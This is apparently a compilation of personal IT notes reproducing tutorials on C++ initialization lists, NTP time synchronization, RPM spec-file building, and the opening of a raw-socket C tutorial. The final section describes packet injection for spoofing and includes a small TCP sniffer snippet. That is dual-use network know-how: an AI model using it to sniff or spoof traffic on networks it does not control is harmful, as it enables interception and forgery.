Initialization Lists: Summary

Before the body of the constructor is run, all of the constructors for its parent class and then for its fields are invoked. By default, the no-argument constructors are invoked. Initialization lists allow you to choose which constructor is called and what arguments that constructor receives.

If you have a reference or a const field, or if one of the classes used does not have a default constructor, you must use an initialization list.

Page 139: Appunti Informatica

Time Synchronization with NTP (Linux)http://www.akadia.com/services/ntp_synchronize.html

Overview

NTP (Network Time Protocol) provides accurate and syncronised time across the Internet. This introductory article will try to show you how to use NTP to control and synchronize your system clock.

First approach

NTP is organised in a hierarchical client-server model. In the top of this hierarchy there are a small number of machines known as reference clocks. A reference clock is known as stratum 0 and is typically a cesium clock or a Global Positioning System (GPS) that receives time from satellites. Attached to these machines there are the so-called stratum 1 servers (that is, stratum 0 clients), which are the top level time servers available to the Internet, that is, they are the best NTP servers available.

Note: in the NTP lingo measure for synchronization distance is termed as stratum: the number of steps that a system lies from a primary time source.

Following this hierarchy, the next level in the structure are the stratum 2 servers which in turn are the clients for stratum 1 servers. The lowest level of the hierarchy is made up by stratum 16 servers. Generally speaking, every server syncronized with a stratum n server is

termed as being at stratum n+1 level. So, there are a few stratum 1 servers which are referenced by stratum 2 servers, wich in turn are refenced by stratum 3 servers, which are referenced by stratum 4 and so on.

NTP servers operating in the same stratum may be associated with others in a peer to peer basis, so they may decide who has the higher quality of time and then can synchronise to the most accurate.

In addition to the client-server model and the peer to peer model, a server may broadcast time to a broadcast or multicast IP addresses and clients may be configured to synchronise to these broadcast time signals.

So, at this point we know that NTP clients can operate with NTP servers in three ways:

in a client-server basis in a peer to peer mode sending the time using broadcast/multicast

How does it work

Whenever ntpd starts it checks its configuration file (/etc/ntp.conf) to determine syncronization sources, authentication options, monitoring options, access control and other operating options. It also checks the frequency file (/etc/ntp/drift) that contains the latest estimate of clock frequency error. If specified, it will also look for a file containing the authentication keys (/etc/ntp/keys).

Note that the path and/or name of these configuration files may vary in your system. Check the -c command line option.

Page 140: Appunti Informatica

Once the NTP daemon is up and running, it will operate by exchanging packets (time and sanity check exchanges) with its configured servers at poll intervals and its behaviour will depend on the delay between the local time and its reference servers. Basically, the process starts when the NTP client sends a packet containing its timestamp to a server. When the server receives such a packet, it will in turn store its own timestamp and a transmit timestamp into the packet and send it back to the client. When the client receives the packet it will log its receipt time in order to estimate the travelling time of the packet.

The packet exchange takes place until a NTP server is accepted as a synchronization source, which take about five minutes. The NTP daemon tries to adjust the clock in small steps and will continue until the client gets the accurate time. If the delay between both the server and client is big enough the daemon will terminate and you will need to adjust the time manually and start the daemon again.

Sample ntp.conf configuration file

     server 134.214.100.6     server swisstime.ee.ethz.ch

     peer 192.168.100.125     peer 192.168.100.126     peer 192.168.100.127

     driftfile /etc/ntp/drift     #multicastclient  # listen on default 224.0.1.1     #broadcastdelay  0.008

     authenticate no

     #keys           /etc/ntp/keys     #trustedkey     65535     #requestkey     65535     #controlkey     65535

     # by default ignore all ntp packets     restrict 0.0.0.0 mask 0.0.0.0 ignore

     # allow localhost     restrict 127.0.0.1 mask 255.255.255.255

     # accept packets from...     restrict 192.168.100.125 mask 255.255.255.255     restrict 192.168.100.126 mask 255.255.255.255     restrict 192.168.100.127 mask 255.255.255.255 

Take a look at references below to understand the configuration options.

References

NTP homepage ntpd Network time protocol (version 3) specification Public NTP Time Servers

NTP Basics

Page 141: Appunti Informatica

NTP stands for Network Time Protocol, and it is an Internet protocol used to synchronize the clocks of computers to some time reference. NTP is an Internet standard protocol originally developed by Professor David L. Mills at the University of Delaware. 

SNTP (Simple Network Time Protocol) is basically also NTP, but lacks some internal algorithms that are not needed for all types of servers.

Time should be synchronized

Time usually just advances. If you have communicating programs running on different computers, time still should even advance if you switch from one computer to another. Obviously if one system is ahead of the others, the others are behind that particular one. From the perspective of an external observer, switching between these systems would cause time to jump forward and back, a non-desirable effect.

As a consequence, isolated networks may run their own wrong time, but as soon as you connect to the Internet, effects will be visible. Just imagine some EMail message arrived five minutes before it was sent, and there even was a reply two minutes before the message was sent.

Basic features of NTP

NTP needs some reference clock that defines the true time to operate. All clocks are set towards that true time. (It will not just make all systems agree on some time, but will make them agree upon the true time as defined by some standard.) 

NTP uses UTC as reference time 

NTP is a fault-tolerant protocol that will automatically select the best of several available time sources to synchronize to. Multiple candidates can be combined to minimize the accumulated error. Temporarily or permanently insane time sources will be detected and avoided. 

NTP is highly scalable: A synchronization network may consist of several reference clocks. Each node of such a network can exchange time information either bidirectional or unidirectional. Propagating time from one node to another forms a hierarchical graph with reference clocks at the top. 

Having available several time sources, NTP can select the best candidates to build its estimate of the current time. The protocol is highly accurate, using a resolution of less than a nanosecond (about 2^-32 seconds). (The popular protocol used by rdate and defined in [RFC 868] only uses a resolution of one second). 

Even when a network connection is temporarily unavailable, NTP can use measurements from the past to estimate current time and error.

UTC (Universal Time Coordinated)

UTC (Universal Time Coordinated, Temps Universel Coordonné) is an official standard for the current time. UTC evolved from the former GMT (Greenwich Mean Time) that once was used to set the clocks on ships before they left for a long journey. Later GMT had been adopted as the world's standard time. One of the reasons that GMT had been replaced as official standard time was the fact that it was based on the mean solar time. Newer methods of time measurement showed that the mean solar time varied a lot by itself.The following list will explain the main components of UTC:

Page 142: Appunti Informatica

Universal means that the time can be used everywhere in the world, meaning that it is independent from time zones (i.e. it's not local time). To convert UTC to local time, one would have to add or subtract the local time zone. 

Coordinated means that several institutions contribute their estimate of the current time, and UTC is built by combining these estimates.

NTP on Unix and Windows 2000

In this example we show, how to synchronize your Linux, Solaris and Windows 2000 Server (Primary Domain Controller) with the Public NTP Time Server: swisstime.ethz.ch

Public NTP Server in Switzerland

swisstime.ethz.ch (129.132.2.21)Location: Integrated Systems Laboratory, Swiss Fed. Inst. of Technology,CH 8092 Zurich, SwitzerlandGeographic Coordinates: 47:23N, 8:32ESynchronization: NTP primary (DCF77 clock), Sun-4/SunOS 4.1.4Service Area: Switzerland/EuropeAccess Policy: open accessContact: Christoph Wicki ([email protected])

Configuration on Unix

Page 143: Appunti Informatica

Unix Workstation as NTP Client

The NTP client program ntpdate sets the system clock once. As real clocks drift, you need periodic corrections. Basically you can run ntpdate in a cron job hourly or daily, but your machine won't be an NTP server then.

Crontab entry to update the system clock once a day

0 2 * * * /usr/sbin/ntpdate -s -b -p 8 -u 129.132.2.21

-b 

Force the time to be stepped using the settimeofday() system call, rather than slewed (default) using the adjtime() system call. This option should be used when called from a startup file at boot time.

-p samples

Specify the number of samples to be acquired from each server as the integer samples, with values from 1 to 8 inclusive. The default is 4.

-s

Divert logging output from the standard output (default) to the system syslog facility. This is designed primarily for convenience of cron scripts.

-u

Direct ntpdate to use an unprivileged port or outgoing packets. This is most useful when behind a firewall that blocks incoming traffic to privileged ports, and you want to synchronise with hosts beyond the firewall. Note that the -d option always uses unprivileged ports.

Unix Workstation as NTP Server

First of all you have to download the NTP sources from www.ntp.org. On RedHat Linux 7.0 / 7.1 the NTP server ntpd is already included in the distribution.

The NTP server ntpd will learn and remember the clock drift and it will correct it autonomously, even if there is no reachable server. Therefore large clock steps can be avoided while the machine is synchronized to some reference clock. In addition ntpd will maintain error estimates and statistics, and finally it can offer NTP service for other machines.

Look at the Startup Script in /etc/rc.d/init.d/ntpd

start() {        # Adjust time to make life easy for ntpd        if [ -f /etc/ntp/step-tickers ]; then             echo -n $"Synchronizing with time server: "             /usr/sbin/ntpdate -s -b -p 8 -u \             `/bin/sed -e 's/#.*//' /etc/ntp/step-tickers`              success             echo        fi        # Start daemons.        echo -n $"Starting $prog: "

Page 144: Appunti Informatica

        daemon ntpd        RETVAL=$?        echo        [ $RETVAL -eq 0 ] && touch /var/lock/subsys/ntpd        return $RETVAL}

Insert swisstime.ethz.ch or more NTP Servers to /etc/ntp/step-tickers

129.132.2.21

Edit the configuration file /etc/ntp.conf

server 127.127.1.0  # local clockserver 129.132.2.21 # swisstime.ethz.ch (stratum 1)driftfile /etc/ntp/driftmulticastclient     # listen on default 224.0.1.1broadcastdelay 0.008

Start NTP Server and check /var/log/messages

# /etc/rc.d/init.d/ntpd start

Troubleshooting

One of the quickest commands to verify that ntpd is still up and running as desired is ntpq -p. That command will show all peers used and configured together with their corner performance data.

# ntpq -p

     remote      refid    st t when poll reach   delay  offset jitter===================================================================== LOCAL(0)        LOCAL(0) 3 l    9   64  377    0.000   0.000   0.000*swisstime.ethz. .DCFa.   1 u   17   64  377   25.088 -10.040   1.071

To obtain a current list peers of the server, along with a summary of each peer's state. Summary information includes the address of the remote peer, the reference ID (0.0.0.0 if this is unknown), the stratum of the remote peer, the type of the peer (local, unicast, multicast or broadcast), when the last packet was received, the polling interval, in seconds, the reachability register, in octal, and the current estimated delay, offset and dispersion of the peer, all in milliseconds.

# ntpq -c pee swisstime.ethz.ch

     remote      refid   st t when poll reach   delay  offset jitter====================================================================*GENERIC(0)      .DCFa.   0 l   14   16  377    0.000   0.126  0.170 LOCAL(0)        LOCAL(0) 6 l   13   64  377    0.000   0.000 10.010 sns2-tss2.unige lantime  2 u  323 1024  377   11.000   0.014  1.770+nz11.rz.uni-kar .DCF.    1 u   40   64  376  353.290  18.088 17.120xjane.planNET.de .DCFa.   1 u   80  256  377  125.050 -38.018  0.210+sombrero.cs.tu- .GPS.    1 u   49   64  377   36.070   1.159  0.790

# ntpdc

Page 145: Appunti Informatica

ntpdc> peers

Be sure that there is an entry for the the swisstime.ethz.ch server, and that there is an entry for your local net. The "st" (stratum) column for the ITD time servers should be "1" or "2", indicating that the time server are stratum-1/2 servers, e.g. they obtain their time from stratum-1 servers, which are directly connected to external time reference sources. If the stratum for any server is "16" then this server is not synchronizing successfully.

     remote           local     st poll reach delay   offset    disp=====================================================================LOCAL(0)        127.0.0.1       3  64 377 0.00000  0.000000 0.00095=cosmos.hsz.akad 5.0.0.0        16  64   0 0.00000  0.000000 0.00000*swisstime.ethz. 192.168.138.29  1 128 377 0.02658 -0.001197 0.00215

Configuration on Windows 2000 Workstation

Windows 2000 (Win2K) uses a time service, known as Windows Time Synchronization Service (Win32Time), to ensure that all Win2K computers on your network use a common time. The W32Time Service is a fully compliant implementation of the Simple Network Time Protocol (SNTP) as detailed in IETF RFC 1769. SNTP uses UDP port 123 by default. If you want to synchronize your time server with an SNTP server on the Internet, make sure that port is available.

Select a NTP server, using 

net time /setsntp:swisstime.ethz.ch

Start the W32time service with

net start W32Time

You can also set the start option of the Windows Time Synchronization Service (W32Time) to Automatic, so the service will start when Windows/2000 starts.

Set the following Registry Entries for the W32Time Service (marked in blue color)

The registry values are located in the following registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters

AvoidTimeSyncOnWan : REG_DWORD (optional)Prevents the computer from synchronizing with a computer that is in another site.0 = the site of the time source is ignored [default]1 = the computer does not synchronize with a time source that is in a different site 

GetDcBackoffMaxTimes : REG_DWORD (optional)The maximum number of times to double the backoff interval when successive attempts to find a domain controller do not succeed. An event is logged every time a wait of the maximum length occurs.0 = the wait between successive attempts is always the minimum and no event is logged7 = [default] 

GetDcBackoffMinutes : REG_DWORD (optional)The initial number of minutes to wait before looking for a domain controller if the last attempt did not

Page 146: Appunti Informatica

succeed. 15 = [default]  

LocalNTP : REG_DWORDUsed to start the SNTP server.0 = do not start the SNTP server unless this computer is a domain controller[default]1 = always start the SNTP server 

NtpServer : REG_SZ (swisstime.ethz.ch)NtpServer : REG_SZ (optional) Used to manually configure the time source. Set this to the DNS name or IP address of the NTP server to synchronize from. You can modify this from the command line by using the net time command. Value is blank by default 

Period : REG_DWORD or REG_SZUsed to control how often the time service synchronizes. If a string value is specified, it must be one of special ones listed below.0 = once a day65535, "BiDaily" = once every 2 days65534, "Tridaily" = once every 3 days65533, "Weekly" = once every week (7 days)65532, "SpecialSkew" = once every 45 minutes until 3 good synchronizations occur, then once every 8 hours (3 per day) [default]65531, "DailySpecialSkew" = once every 45 minutes until 1 good synchronization occurs, then once every dayfreq = freq times per day 

ReliableTimeSource : REG_DWORD (optional)Used to indicate that this computer has reliable time.0 = do not mark this computer as having reliable time [default]1 = mark this computer as having reliable time (this is only useful on a domain controller) 

Type : REG_SZUsed to control how a computer synchronizes.Nt5DS = synchronize to domain hierarchy [default]NTP = synchronize to manually configured sourceNoSync = do not synchronize time

The Nt5DS setting may not use a manual configured source.

The Adj and msSkewPerDay values are used to preserve information about the computer's clock between restarts. Do not manually edit these values.

More Information

For further information about NTP in Windows/2000 see

http://support.microsoft.com/support/kb/articles/q224/7/99.asphttp://support.microsoft.com/support/kb/articles/q216/7/34.asphttp://support.microsoft.com/support/kb/articles/q223/1/84.asphttp://support.microsoft.com/support/kb/articles/q120/9/44.asp

Page 147: Appunti Informatica

http://support.microsoft.com/support/kb/articles/Q232/2/55.asphttp://labmice.techtarget.com/windows2000/timesynch.htm

For further information about NTP see

http://www.eecis.udel.edu/~ntp/

RPM package building guide (Linux)Tratta da : http://rpm.rutgers.edu/guide.html

Introduction to rpm package building

Rpm packages are usually built with a "spec file," which is a collection of text and shell scripts that build, install and describe a software program. Here is a typical spec file:

Summary: Rc shell from Plan 9Name: rcVersion: 1.6Release: 1Group: System Environment/ShellsCopyright: BSD-typeSource: rc-%{version}.tar.gzBuildRoot: %{_tmppath}/%{name}-rootRequires: readlineBuildRequires: readline-devel

%descriptionrc is a command interpreter and programming language similar to sh(1).It is based on the AT&T Plan 9 shell of the same name. The shelloffers a C-like syntax (much more so than the C shell), and a powerfulmechanism for manipulating variables. It is reasonably small andreasonably fast, especially when compared to contemporary shells. Itsuse is intended to be interactive, but the language lends itself wellto scripts.

[from the man page]

%prep%setup -q

%buildLD="/usr/ccs/bin/ld -L/usr/local/lib -R/usr/local/lib" \ LDFLAGS="-L/usr/local/lib -R/usr/local/lib" ./configure --with-history \ --with-readlinemake

%installrm -rf $RPM_BUILD_ROOTmkdir -p $RPM_BUILD_ROOT/usr/localmake install prefix=$RPM_BUILD_ROOT/usr/local sysconfdir=$RPM_BUILD_ROOT/etc

%cleanrm -rf $RPM_BUILD_ROOT

%files%defattr(-,bin,bin)%doc COPYING AUTHORS EXAMPLES README RELDATE ChangeLog/usr/local/bin/rc

Page 148: Appunti Informatica

/usr/local/bin/-/usr/local/bin/--/usr/local/bin/-p/usr/local/bin/--p/usr/local/man/man1/rc.1/usr/local/man/man1/history.1

The spec file is split into several sections, which will be examined individually.

In order to write spec files, it is important to understand rpm's dependency checking, macros and directory structure. When you build a package, rpm creates a list of the shared libraries that it includes and a list of the shared libraries to which it is linked. RPM records the shared libraries that the package provides, along with the package name itself and anything manually specified in the spec file, along with version information. Similarly, RPM records the required shared libraries and manually specified requires. In rc, readline, libc.so.1, libcurses.so.1, libdl.so.1 and libreadline.so.4 are required, and rc (version 1.6) is provided. Readline and libreadline.so.4 are both provided by the readline package; the rest are provided by the operating system.

"Build requires" -- packages required at build time -- can be specified in a spec file. When it is built, rc needs readline-devel, as it has the header files for the readline library.

Rpm has a simple macro system. Macros can be defined like so:

%define foo bar%{foo}

is preprocessed to become "bar". Rpm has logical constructs: %if/%else/%endif, %ifos, and %ifarch (cf. openssl.spec).

Finally, rpm has a system of directories for package building:

prefix/src/redhat/RPMS/sparcprefix/src/redhat/RPMS/sparc64prefix/src/redhat/RPMS/sparcv9 . . .prefix/src/redhat/SRPMSprefix/src/redhat/SOURCES ($RPM_SOURCE_DIR)prefix/src/redhat/BUILD ($RPM_BUILD_DIR)prefix/src/redhat/SPECS

RPM expects to find your source in SOURCES; it will unpack and compile the source code in BUILD. RPM expects to find the files that the package will install in $RPM_BUILD_ROOT, which rc has set to %{_tmppath}/rc-root ("%{_tmppath}" is a macro set by rpm which expands to the name of a directory for temporary files).

The Preamble

The preamble from rc.spec is: Summary: Rc shell from Plan 9Name: rcVersion: 1.6Release: 1Group: System Environment/ShellsCopyright: BSD-typeSource: rc-%{version}.tar.gzBuildRoot: %{_tmppath}/%{name}-rootRequires: readline

Page 149: Appunti Informatica

It describes the package name, version, etc. Name, Version, Release, Group, Copyright (or License), and Summary are required. Other fields, such as URL and Packager, are optional. Name, Version and Release define macros called %{name}, %{version} and %{release} respectively.

Generally, source filenames match the expansion of "%{name}-%{version}.tar.gz". The %{version} macro makes maintaining the package much easier; its use is highly recommended. If the source field has an URL, rpm automatically downloads the source and places it in $RPM_SOURCE_DIR. You can specify multiple sources with Source0, Source1, etc.

The %description

This section is parsed separately from the preamble, but can be thought of as another field. Generally, one can steal the introduction from a README or man page to get a good description.

The %prep section

%prep%setup -q

The %prep section is where the source is prepared, usually in $RPM_BUILD_DIR. Rpm provides the %setup and %patch primitives which automatically untar and patch your source. %setup expects it to untar into a directory called %{name}-%{version}; otherwise you have to pass it the -n switch, which renames the directory. The important %setup switches are:

-n <name> (name of build directory)-c (creates top-level build directory)-D (don't delete top-level build directory)-T (don't unpack Source0)-a <n> (unpack Source number n, after cd'ing to build directory)-a <n> (unpack Source number n, before cd'ing to build directory)-q (unpack silently)

To unpack several sources into the same directory, you need to have something like the following in %prep:

%setup -q%setup -D -T -a 1%setup -D -T -a 2

That unpacks source 0, then cds into %{name}-%{version} and unpacks source 1 and 2. As for patches, you have the following switches: -P < n > (use Patch number n)-p, -b, -E (see patch(1))

While %prep appears to be all macros, don't be fooled -- %prep, %clean, %build, %install, %pre, %post, etc. are all shell scripts.

You might need to install GNU tar and put it on your PATH before Sun tar when building packages with extremely long filenames (the GNOME software in particular requires gnutar).

The %build section

%buildLD="/usr/ccs/bin/ld -L/usr/local/lib -R/usr/local/lib" \ LDFLAGS="-L/usr/local/lib -R/usr/local/lib" ./configure --with-history \ --with-readlinemake

The %build section is where the actual compiling takes place. Rpm has a %configure macro, which is broken by design (it takes the directories from prefix/lib/rpm/macros, so it might misplace your files; and it only

Page 150: Appunti Informatica

works with GNU configure). With GNU configure, you probably want to configure and build the sources like so:

automake # if you patched Makefile.amautoconf # if you patched configure.inLD="/usr/ccs/bin/ld -L/usr/local/lib -R/usr/local/lib" \LDFLAGS="-L/usr/local/lib -R/usr/local/lib" CPPFLAGS="-I/usr/local/include" \./configure --prefix=/usr/local --sysconfdir=/etcmake

Unfortunately, GNU configure may not use $LD and $LDFLAGS together -- sometimes it does, and sometimes it doesn't. It is more reliable to pass everything into configure (especially because it increases the chance that your specfile will work on someone else's machine). If you're compiling C++ for X, add CXX="g++ -fpermissive" (Sun's include files aren't ANSI C++).

As for imake (with Sun's cc, not gcc), try:

xmkmf -amake CCOPTIONS="-I/usr/local/include" LINTOPTS="" \ EXTRA_LDOPTIONS="-L/usr/local/lib -R/usr/local/lib"

Using imake and gcc is left as an exercise to the reader.

Don't specify the prefix as $RPM_BUILD_ROOT/usr/local; many programs hardcode file locations at the configure or make stage.

The %install section

%installrm -rf $RPM_BUILD_ROOTmkdir -p $RPM_BUILD_ROOT/usr/localmake install prefix=$RPM_BUILD_ROOT/usr/local sysconfdir=$RPM_BUILD_ROOT/etc

The %install section is where the files get "installed" into your build root. You can build rpms without a build root, but this practice is highly deprecated and insecure (more on this later). Always begin the %install section with something along the lines of

rm -rf $RPM_BUILD_ROOTmkdir -p $RPM_BUILD_ROOT/usr/local

Sometimes, you can get away with just adding make install prefix=$RPM_BUILD_ROOT/usr/local

Usually, it's a little hairier. If your program puts files in /etc, you have to tell make install (if you use make install). If a program hardcodes file locations at the make install stage, the best solution is to massage the output of make -n install. Truly devious programs such as qmail, which compile their own installer, make require patches to install correctly.

Other scripts

%cleanrm -rf $RPM_BUILD_ROOT

Generally, the only other script you need is %clean, which gets executed after the build (just clean out $RPM_BUILD_ROOT). You also get %pre (preinstall), %post (postinstall), %preun (preuninstall), %postun (postuninstall), %verifyscript (executed with rpm -V), and triggers (read the documentation included with rpm).

Page 151: Appunti Informatica

The %files section

%files%defattr(-,bin,bin)%doc COPYING AUTHORS EXAMPLES README RELDATE ChangeLog/usr/local/bin/rc/usr/local/bin/-/usr/local/bin/--/usr/local/bin/-p/usr/local/bin/--p/usr/local/man/man1/rc.1/usr/local/man/man1/history.1

The %files section is where you list all the files in the package. You have a few commands at your disposal: %doc (marks documentation), %attr (marks attibutes of a file - mode [- means don't change mode], user, group), %defattr (default attributes), %verify (see Maximum RPM), %config (marks configuration files), %dir and %docdir.

If a filename in the %files list corresponds to a directory, the package owns the directory as well as all the files in it; so don't put /usr/bin in your %files list. Be careful with globbing and directories; if you list a file twice, rpm will not build your package. Also, some symlinks (absolute ones) cause rpm to complain bitterly; avoid unintentionally grabbing them.

Methods for generating file lists

Unfortunately, generating file lists isn't always easy. Assuming that you didn't have to parse the output of make -n install yourself to write the %install section, try doing something sneaky like:

$ ./configure --prefix=/usr/local --sysconfdir=/etc$ make$ mkdir -p sandbox/usr/local/$ make install prefix=`pwd`/sandbox/usr/local/ sysconfdir=`pwd`/etc$ for i in `find sandbox -type f` ; do # check to ensure that no files> strings $i | grep sandbox && echo $i # "know" that they were installed> done # in the build root

Check out the Makefile. Some packages use prefix; others use PREFIX, DESTDIR, or something different. Sometimes, you don't need to add the "usr/local" part. This is, incidentally, a good reason not to build packages as root&emdash;if you accidentally install the software on your system (instead of in an empty directory), you cannot test your package as easily.

Using the rudimentary genspec.pl script (or find(1)), you can use this directory to generate a file list. After you get a list, you may wish to replace long lists of files with globs. For instance:

/usr/local/lib/locale/cs/LC_MESSAGES/rpm.mo/usr/local/lib/locale/de/LC_MESSAGES/rpm.mo/usr/local/lib/locale/fi/LC_MESSAGES/rpm.mo/usr/local/lib/locale/fr/LC_MESSAGES/rpm.mo/usr/local/lib/locale/ja/LC_MESSAGES/rpm.mo/usr/local/lib/locale/pl/LC_MESSAGES/rpm.mo/usr/local/lib/locale/pt_BR/LC_MESSAGES/rpm.mo/usr/local/lib/locale/ru/LC_MESSAGES/rpm.mo/usr/local/lib/locale/sk/LC_MESSAGES/rpm.mo/usr/local/lib/locale/sk/LC_MESSAGES/popt.mo/usr/local/lib/locale/sl/LC_MESSAGES/rpm.mo/usr/local/lib/locale/sr/LC_MESSAGES/rpm.mo/usr/local/lib/locale/sv/LC_MESSAGES/rpm.mo/usr/local/lib/locale/tr/LC_MESSAGES/rpm.mo/usr/local/lib/locale/ro/LC_MESSAGES/popt.mo

Page 152: Appunti Informatica

becomes

/usr/local/lib/locale/*/LC_MESSAGES/*.mo

This makes packages more maintainable. If Spanish translations were added, the glob would catch them; otherwise, you would have to add /usr/local/lib/local/es/LC_MESSAGES/rpm.mo to the file list. You have to be careful, however, that the globs catch only the files or directories you want.

Sometimes, it may be appropriate to generate a file list on the fly. The perl package does this:

%buildsh Configure -de -Dprefix=/usr/local -Dcpp='/opt/SUNWspro/bin/cc -E' \ -Dcc='/opt/SUNWspro/bin/cc' \ -Dinstallprefix="$RPM_BUILD_ROOT/usr/local" \ -Dldflags='-L/usr/local/lib -R/usr/local/lib' -Dusethreadsmakemake test

%installrm -rf $RPM_BUILD_ROOTmkdir -p $RPM_BUILD_ROOT/usr/localmake install

# clean up files which know about the build rootfor fn in .packlist Config.pm ; do afn="$RPM_BUILD_ROOT/usr/local/lib/perl5/%{version}/%{perl_arch}/$fn" chmod 0644 $afn mv $afn $afn.TEMP sed "s#$RPM_BUILD_ROOT##g" < $afn.TEMP > $afn rm -f $afn.TEMPdonechmod 0444 \ $RPM_BUILD_ROOT/usr/local/lib/perl5/%{version}/%{perl_arch}/Config.pm

find $RPM_BUILD_ROOT -type f \( -name \*.h -o -name \*.a \) -print \ | sed "s#^$RPM_BUILD_ROOT/*#/#" > DEVEL-LISTfind $RPM_BUILD_ROOT -type f ! \( -name \*.h -o -name \*.a \) -print \ | sed "s#^$RPM_BUILD_ROOT/*#/#" > REGULAR-LIST

%files -f REGULAR-LIST%doc Copying Artistic README

%files devel -f DEVEL-LIST

Subpackages

If you want to make more than one package out of a single source tree, you have to use subpackages. Here is an example of spec file with subpackages:

Name: readlineVersion: 4.1Copyright: GPLGroup: System Environment/LibrariesSummary: GNU readlineRelease: 1Source: readline-4.1.tar.gzProvides: libhistory.soProvides: libreadline.soBuildRoot: %{_tmppath}/%{name}-root

%descriptionGNU readline is a library that enables history, completion, and

Page 153: Appunti Informatica

emacs/vi-like motion functionality in a program linked with it.

%package develSummary: Readline header files, static librariesGroup: Development/LibrariesRequires: readline = 4.1

%description develThis package contains the header files and static libraries forreadline. Install this package if you want to write or compile aprogram that needs readline.

%prep%setup -q

%buildautoconfLDFLAGS="-L/usr/local/lib -R/usr/local/lib" ./configure \ --prefix=/usr/local --enable-sharedmakemake shared

%installrm -rf $RPM_BUILD_ROOTmkdir -p $RPM_BUILD_ROOT/usr/localmake install prefix=$RPM_BUILD_ROOT/usr/localmake install-shared prefix=$RPM_BUILD_ROOT/usr/local

%cleanrm -rf $RPM_BUILD_ROOT

%post ln -s /usr/local//lib/libhistory.so.4 /usr/local/lib/libhistory.soln -s /usr/local//lib/libreadline.so.4 /usr/local/lib/libreadline.soif [ -x /usr/local/bin/install-info ] ; then

/usr/local/bin/install-info --info-dir=/usr/local/info \ /usr/local/info/rluserman.info

/usr/local/bin/install-info --info-dir=/usr/local/info \ /usr/local/info/history.info

fi

%preunrm /usr/local/lib/libhistory.sorm /usr/local/lib/libreadline.soif [ -x /usr/local/bin/install-info ] ; then

/usr/local/bin/install-info --delete --info-dir=/usr/local/info \ /usr/local/info/rluserman.info

/usr/local/bin/install-info --delete --info-dir=/usr/local/info \ /usr/local/info/history.info

fi

%files%defattr(-,bin,bin)%doc COPYING/usr/local/lib/libhistory.so.4/usr/local/lib/libreadline.so.4/usr/local/info/readline.info/usr/local/info/rluserman.info/usr/local/info/history.info/usr/local/man/man3/readline.3

%files devel%defattr(-,bin,bin)/usr/local/include/readline/usr/local/lib/libreadline.a/usr/local/lib/libhistory.a

Page 154: Appunti Informatica

This creates two packages: readline and readline-devel. (If you just want devel, replace %package devel with %package -n devel and %files with %files -n devel).

Style and Security

Don't build packages as root; edit prefix/lib/rpm/macros so you can build in your home directory. If you build as root, you run the risk of accidentally installing files on your system. Instead of using chown in %install, use %attr in %files.

Be careful when building on a multiuser system; the buildroot, if it is in a globally-writable directory, is a big security hole.

Don't use the %config directive. It might break packages that a user is upgrading; instead, at the end of %install, write

for i in `find $RPM_BUILD_ROOT/etc -type f` ; do mv $i $i.rpm done

and warn the user in %post.

Don't make the user set his or her LD_LIBRARY_PATH. Instead, use -R. If you need to patch configure, patch configure.in instead. Don't interactively involve the user at build or compile time. Try to split your packages into static library/header "development" packages and shared library

packages. If you are building GNU replacements for tools packaged with Solaris (e.g. fileutils, grep, tar), put

them in /usr/local/gnu instead of /usr/local. Avoid putting any binaries in /usr/local/bin that conflict with any in /usr/ccs/bin, /usr/bin, etc.

Use %{_tmppath} instead of /free/tmp or /var/tmp—it is more portable.

Per la guida completa :

rpm-guide.pdf

Mio:

Negli script degli rpm per riferirsi alla variabile prefix usata per la rilocazione

[ rpm –ivh XXXX.rpm --prefix] si usa:

$RPM_INSTALL_PREFIX.

Page 155: Appunti Informatica

A brief programming tutorial in C for raw sockets (Linux C++)

http://csis.bits-pilani.ac.in/faculty/dk_tyagi/Study_stuffs/raw.html

[ Altre risorse : IP SPOOFING with BSD RAW SOCKETS INTERFACE.docx]

1.    Raw sockets2.    The protocols IP, ICMP, TCP and UDP3.    Building and injecting datagrams4.    Basic transport layer operations

In this tutorial, you'll learn the basics of using raw sockets in C, to insert any IP protocol based datagram into the network traffic. This is useful,for example, to build raw socket scanners like nmap, to spoof or to perform operations that need to send out raw sockets. Basically, you can send any packet at any time, whereas using the interface functions for your systems IP-stack (connect, write, bind, etc.) you have no direct control over the packets. This theoretically enables you to simulate the behavior of your OS's IP stack, and also to send stateless traffic (datagrams that don't belong to a valid connection).

I. Raw sockets

The basic concept of low level sockets is to send a single packet at one time, with all the protocol headers filled in by the program (instead of the kernel). Unix provides two kinds of sockets that permit direct access to the network. One is SOCK_PACKET, which receives and sends data on the device link layer. This means, the NIC specific header is included in the data that will be written or read. For most networks, this is the ethernet header. Of course, all subsequent protocol headers will also be included in the data. The socket type we'll be using, however, is SOCK_RAW, which includes the IP headers and all subsequent protocol headers and data.

The (simplified) link layer model looks like this:Physical layer -> Device layer (Ethernet protocol) -> Network layer (IP) ->Transport layer (TCP, UDP, ICMP) -> Session layer (application specific data)

Now to some practical stuff. A standard command to create a datagram socket is: socket (PF_INET, SOCK_RAW, IPPROTO_UDP); From the moment that it is created, you can send any IP packets over it, and receive any IP packets that the host received after that socket was created if you read() from it. Note that even though the socket is an interface to the IP header, it is transport layer specific. That means, for listening to TCP, UDP and ICMP traffic, you have to create 3 separate raw sockets, using IPPROTO_TCP, IPPROTO_UDP and IPPROTO_ICMP (the protocol numbers are 0 or 6 for tcp, 17 for udp and 1 for icmp).

With this knowledge, we can, for example, already create a small sniffer, that dumps out the contents of all tcp packets we receive. (Headers, etc. are missing, this is just an example. As you see, we are skipping the IP and TCP headers which are contained in the packet, and print out the payload, the data of the session/application layer, only).

int fd = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);char buffer[8192]; /* single packets are usually not bigger than 8192 bytes */while (read (fd, buffer, 8192) > 0) printf ("Caught tcp packet: %s\n", buffer+sizeof(struct iphdr)+sizeof(struct tcphdr));

Page 156: Appunti Informatica

II. The protocols IP, ICMP, TCP and UDP

To inject your own packets, all you need to know is the structures of the protocols that need to be included. Below you will find a short introduction to the IP, ICMP, TCP and UDP headers. It is recommended to build your packet by using a struct, so you can comfortably fill in the packet headers. Unix systems provide standard structures in the header files (eg. ). You can always create your own structs, as long as the length of each option is correct. To help you create portable programs, we'll use the BSD names in our structures. We'll also use the little endian notation. On big endian machines (some other processor architectures than intel x86), the 4 bit-size variables exchange places. However, one can always use the structures in the same ways in this program. Below each header structure is a short explanation of its members, so that you know what values should be filled in and which meaning they have.

